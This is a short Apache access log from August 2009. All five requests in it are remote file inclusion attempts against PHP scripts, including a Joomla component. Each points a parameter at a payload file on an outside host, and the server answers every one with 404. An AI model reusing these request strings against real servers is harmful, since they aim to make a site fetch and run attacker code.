220.123.239.163 - - [12/Aug/2009:00:24:32 -0400] "GET /logs/access_log.Q109061100/start.php?lang=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:00:24:32 -0400] "GET /logs/start.php?lang=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:00:24:32 -0400] "GET /start.php?lang=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.93.147.154 - - [12/Aug/2009:00:24:36 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://h1.ripway.com/planet121/new.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
195.209.236.77 - - [12/Aug/2009:00:24:44 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
